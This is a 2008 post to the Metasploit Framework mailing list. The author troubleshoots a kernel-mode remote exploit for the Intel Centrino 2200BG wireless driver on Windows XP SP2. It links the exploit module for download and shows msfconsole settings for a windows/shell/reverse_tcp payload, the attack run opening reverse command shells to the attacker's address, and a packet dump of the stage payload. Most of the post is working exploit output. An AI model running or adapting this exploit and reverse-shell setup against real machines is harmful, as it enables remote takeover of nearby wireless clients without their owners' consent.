[framework] Mistake in kernel mode payloads

Giuseppe Gottardi overet at securitydate.it
Tue Mar 11 14:43:41 CDT 2008 

On Wed, Feb 27, 2008 at 1:34 AM,  <mmiller at hick.org> wrote:
> On Wed, Feb 27, 2008 at 01:27:24AM +0100, Giuseppe Gottardi wrote:
>  > Hi mans,
>  > I have a little trouble with windows kernel mode exploitation.
>  >
>  > When an user land payload is executed in the context of lsass.exe
>  > process, it forces the process lsass.exe to exit and the system shut
>  > down after 60 seconds due to lsass.exe system error.
>
>  What is EXITFUNC set to when you run your exploit?  In general, the
>  stager assumes that the user-mode payload will take care of cleanup.
>  Currently, this typically involves a call to ExitProcess, ExitThread, or
>  generating an exception (depending on EXITFUNC).  If your EXITFUNC is
>  set to seh this will likely cause lsass to crash in the manner that
>  you're seeing.
>

Sorry for the latency to get back to you, I have been very busy in this days.

I decide to publish the code we talking about. It is a full functional
version exploit for Intel centrino 2200BG that you
can download from my web site and add to metasploit if you want:

http://overet.securitydate.it/stuff/intel_2200BG_probe.rb

As you can see, EXITFUNC is not set to seh but the lsass.exe die when
I try to use staged payloads.

For example...

msf exploit(intel_2200BG_probe) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
...
msf exploit(intel_2200BG_probe) > show options

Module options:

   Name       Current Setting    Required  Description
   ----       ---------------    --------  -----------
   ADDR_DST   00:0e:35:95:7b:45  yes       The MAC address to send this to
   CHANNEL    1                  yes       The default channel number
   DELAY      1                  yes       The number of seconds to
sleep between the packets
   DRIVER     madwifing          yes       The name of the wireless
driver for lorcon
   INTERFACE  ath8               yes       The name of the wireless interface
   RUNTIME    1000               yes       The number of time to run the attack


Payload options:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST     192.168.33.212   yes       The local address
   LPORT     4444             yes       The local port


Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP2 (5.1.2600), w22n51.sys 8.0.12.20000


msf exploit(intel_2200BG_probe) > rexploit
[*] Started reverse handler
[*] Sending probe exploit to 00:0e:35:95:7b:45...
[-] #################################################################################################################[*]
Sending stage (474
bytes)
[*] Command shell session 2 opened (192.168.33.212:4444 -> 192.168.33.159:1085)
#
[*] Completed sending probe.

(lsass.exe die)


tcpdump output:

15:45:30.849331 IP overet.imgames > 192.168.33.212.krb524: S
1057652243:1057652243(0) win 65535 <mss 1460,nop,nop,sackOK>
        0x0000:  4500 0030 1abe 4000 8006 1b46 c0a8 219f  E..0.. at ....F..!.
        0x0010:  c0a8 21d4 0435 115c 3f0a 7e13 0000 0000  ..!..5.\?.~.....
        0x0020:  7002 ffff ebac 0000 0204 05b4 0101 0402  p...............
15:45:30.849386 IP 192.168.33.212.krb524 > overet.imgames: S
3241052817:3241052817(0) ack 1057652244 win 5840 <mss
1460,nop,nop,sackOK>
        0x0000:  4500 0030 0000 4000 4006 7604 c0a8 21d4  E..0.. at .@.v...!.
        0x0010:  c0a8 219f 115c 0435 c12e 8a91 3f0a 7e14  ..!..\.5....?.~.
        0x0020:  7012 16d0 890b 0000 0204 05b4 0101 0402  p...............
15:45:30.849506 IP overet.imgames > 192.168.33.212.krb524: . ack 1 win 65535
        0x0000:  4500 0028 1abf 4000 8006 1b4d c0a8 219f  E..(.. at ....M..!.
        0x0010:  c0a8 21d4 0435 115c 3f0a 7e14 c12e 8a92  ..!..5.\?.~.....
        0x0020:  5010 ffff cc9f 0000 0000 0000 0000       P.............
15:45:30.850715 IP 192.168.33.212.krb524 > overet.imgames: P
1:475(474) ack 1 win 5840
        0x0000:  4500 0202 8379 4000 4006 f0b8 c0a8 21d4  E....y at .@.....!.
        0x0010:  c0a8 219f 115c 0435 c12e 8a92 3f0a 7e14  ..!..\.5....?.~.
        0x0020:  5018 16d0 e9ca 0000 6833 3200 0068 5753  P.......h32..hWS
        0x0030:  325f 57fc e84c 0000 0060 8b6c 2428 8b45  2_W..L...`.l$(.E
        0x0040:  3c8b 7c05 7801 ef8b 4f18 8b5f 2001 ebe3  <.|.x...O.._....
        0x0050:  3049                                     0I
15:45:30.988871 IP overet.imgames > 192.168.33.212.krb524: . ack 475 win 65061
        0x0000:  4500 0028 1ac0 4000 8006 1b4c c0a8 219f  E..(.. at ....L..!.
        0x0010:  c0a8 21d4 0435 115c 3f0a 7e14 c12e 8c6c  ..!..5.\?.~....l
        0x0020:  5010 fe25 cc9f 0000 0000 0000 0000       P..%..........


msf exploit(intel_2200BG_probe) > sessions -l

Active sessions
===============

  Id  Description    Tunnel
  --  -----------    ------
  1   Command shell  192.168.33.212:4444 -> 192.168.33.159:1234
  2   Command shell  192.168.33.212:4444 -> 192.168.33.159:1077

msf exploit(intel_2200BG_probe) > sessions -i 2
[*] Starting interaction with 2...


( Session doesn't appear :/ )



However, the exploit works with "windows/exec" payload.

Do you have any idea about this problem?


Thanks for your support and regards,
Giuseppe Gottardi

More information about the Framework mailing list